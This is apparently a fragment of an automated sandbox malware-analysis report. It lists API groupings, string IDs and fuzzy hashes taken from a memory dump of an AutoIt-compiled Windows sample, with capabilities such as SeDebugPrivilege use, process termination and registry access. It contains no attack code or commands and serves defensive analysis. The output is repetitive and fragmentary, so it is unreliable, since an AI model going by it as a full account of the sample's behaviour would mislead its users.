                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                    • String ID: tooltips_class32
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Color$LongWindow$ModeObjectStockText
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscat$FileInfoQueryValueVersion$Sizewcscpywcsstr
                                                                                                                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                                                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                                                                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: SendString$BuffCharDriveLowerType
                                                                                                                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                    • API String ID: 1600147383-4113822522
Similarity
• API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
• String ID: .dll$.exe$.icl
• API String ID: 258715311-1154884017
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3840717409-0
Similarity
• API ID: Variant$ClearInit
• String ID: %4d%02d%02d%02d%02d%02d$Default
• API String ID: 2610073882-3931177956
Similarity
• API ID: Filewcscat$DeleteTemp$NamePath_fread_nolock_invalid_parameter_noinfowcscpy
• String ID: aut
• API String ID: 130057722-3010740371
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopRect
• String ID: tooltips_class32
• API String ID: 2443926738-1918224756
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentDirectoryTime$File$Localwcscat$Systemwcscpy
                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                    • API String ID: 1111067124-438819550
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2598888154-3916222277
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                                                                                                                    • API String ID: 2706829360-2785691316
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF656D4FD7B), ref: 00007FF656D51143
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BuffCharUpper
                                                                                                                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                    • API String ID: 3964851224-909552448
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                    • API String ID: 4125642244-438819550
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                    • String ID: P
                                                                                                                                                                                                                    • API String ID: 1460738036-3110715001
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LoadStringwprintf
                                                                                                                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Thread$Window$CurrentMessageProcessSendSleep$ActiveAttachDialogEnumFindInputTimeWindowstime
                                                                                                                                                                                                                    • String ID: BUTTON
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BuffCharDriveLowerTypewcscpy
                                                                                                                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                                                                                                                                                                    • String ID: %s%u
                                                                                                                                                                                                                    • API String ID: 1412819556-679674701
                                                                                                                                                                                                                    • Opcode ID: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                                                                                                                                                                                    • Instruction ID: 4865e42a05d773ccc0ce6237c4a4cbf137504bd02be791a6cdfe87dcb7e5614c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AB1D172B0868296EB28CB25D844AF977A0FF45B84F480A31CE1EA7795DF3EE555C700
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpperwcsstr
                                                                                                                                                                                                                    • String ID: ThumbnailClass
                                                                                                                                                                                                                    • API String ID: 4010642439-1241985126
                                                                                                                                                                                                                    • Opcode ID: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                                                                                                                                                                                    • Instruction ID: 65f49733133c9614017b7284c5eb3ce35de66c14a6b1afcb36b3a7c61bea5ef8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05A1D822B0868643EB249F15DC447BDA761FF85784F488735CB8EA3A95DE3EE945CB00
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                    • String ID: P
                                                                                                                                                                                                                    • API String ID: 1268354404-3110715001
                                                                                                                                                                                                                    • Opcode ID: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                                                                                                                                                                    • Instruction ID: 759116b676916709df26b5991c55acdbc7c83e5ed4f19cacc44001f2010986cb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79619176A086428AEF54DF25D84067937A0FB84BD8F584A35DD0EA7BA4DF3EE444C700
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LoadStringwprintf
                                                                                                                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                    • API String ID: 3297454147-2391861430
                                                                                                                                                                                                                    • Opcode ID: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
                                                                                                                                                                                                                    • Instruction ID: 53495b4095a08e281ff685e10801c9ef7ffb93a4ae507bdf64aca0ad5f5f36a8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6971B771F18A8296EB40DB65E8504ED6330FF44784F881632EE4EA76A9DF7EE506C740
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                                                                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                    • API String ID: 3030280669-22481851
                                                                                                                                                                                                                    • Opcode ID: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                                                                                                                                                                    • Instruction ID: 68c70a5bad7937a496092a756f1ccff76bf2aa684cd8c67bcbfa674fcf0e220c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F51E562B18A8285EB10DB65E8902ED77B0FB843C4F841231EE4DA7A79DF3DD185C700
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                                                    • API String ID: 3821898125-2160076837
                                                                                                                                                                                                                    • Opcode ID: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
                                                                                                                                                                                                                    • Instruction ID: 6c8b7e41ae503baf80d2ed6a20ce0944f36caad7dd6147e6f3a735a63cbe8ddf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC415A326087818BEB708F25E444B5AB3A1FB89790F584735DA9D97B98CF3ED485CB00
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                                                                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                                                                                                                    • API String ID: 3827137101-3457252023
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1255039815-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB6838: CreateFileW.KERNELBASE ref: 00007FF656CB68A2
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD4380: GetCurrentDirectoryW.KERNEL32(?,00007FF656CBE817), ref: 00007FF656CD439C
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB56D4: GetFullPathNameW.KERNEL32(?,00007FF656CB56C1,?,00007FF656CB7A0C,?,?,?,00007FF656CB109E), ref: 00007FF656CB56FF
                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32 ref: 00007FF656CBE8B0
                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32 ref: 00007FF656CBE9FA
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                                                                                                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                                                                                    • API String ID: 2207129308-1018226102
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                    • API String ID: 636576611-1287834457
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Icmp$CleanupCloseCreateEchoFileHandleSendStartupgethostbynameinet_addr
                                                                                                                                                                                                                    • String ID: 5$Ping
                                                                                                                                                                                                                    • API String ID: 1486594354-1972892582
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
• Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                                                                                    • API String ID: 3215553584-2617248754
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                                                                    • API String ID: 4194297153-14809454
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleLoadMessageModuleStringwprintf
                                                                                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                    • API String ID: 4007322891-4153970271
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName
                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                    • API String ID: 2573188126-1403004172
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName
                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                    • API String ID: 2573188126-1403004172
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscpy$CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                    • String ID: 0.0.0.0
                                                                                                                                                                                                                    • API String ID: 2479661705-3771769585
                                                                                                                                                                                                                    • Opcode ID: cd07d64ab6c51d3608c519256f41ea01ac0918377033b5f2a2923fb92afffcd5
                                                                                                                                                                                                                    • Instruction ID: 04b67b9e79d1dcdf7f5e47cac95f65b6e208c1ea5cbe81bbb279c353f08ed0f7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd07d64ab6c51d3608c519256f41ea01ac0918377033b5f2a2923fb92afffcd5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6216061B0C98791EB60AB11E8443BD6331EF98B80F484732D54EA76E5DF6EE948C300
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                            • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                            • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                            • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                            • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2672075419-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2156557900-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Virtual$MessagePostSleepThread$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 685491774-0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                    • API String ID: 0-1603158881
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Variant$Init$Clear
                                                                                                                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                                                                                                                                                                    • API String ID: 3467423407-1765764032
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                                                                                                                                                                                    • String ID: -----$SysListView32
                                                                                                                                                                                                                    • API String ID: 2361508679-3975388722
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClassMessageNameParentSend_invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                    • API String ID: 2019164449-3381328864
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeString$FileFromLibraryModuleNamePathQueryType
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1903627254-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3210457359-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                                                                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                    • API String ID: 3721556410-2107944366
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                    • String ID: 2$P
                                                                                                                                                                                                                    • API String ID: 93392585-1110268094
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$LongMessageSend$Show
                                                                                                                                                                                                                    • String ID: '
                                                                                                                                                                                                                    • API String ID: 257662517-1997036262
APIs
Strings
Memory Dump Source
• Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
• Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
Similarity
• API ID: IconLoad_invalid_parameter_noinfo
• String ID: blank$info$question$stop$warning
• API String ID: 4060274358-404129466
APIs
Strings
Memory Dump Source
• Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
• Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
Similarity
• API ID: HandleLoadModuleString$Messagewprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 4051287042-3128320259
APIs
Memory Dump Source
• Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
• Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
Similarity
• API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
• String ID:
• API String ID: 1211466189-0
APIs
Memory Dump Source
• Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
• Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
Similarity
• API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
• String ID:
• API String ID: 50796853-0
APIs
Memory Dump Source
• Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
• Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
APIs
Memory Dump Source
• Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
• Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2550207440-0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3225163088-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSendWindow$Enabled
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3694350264-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
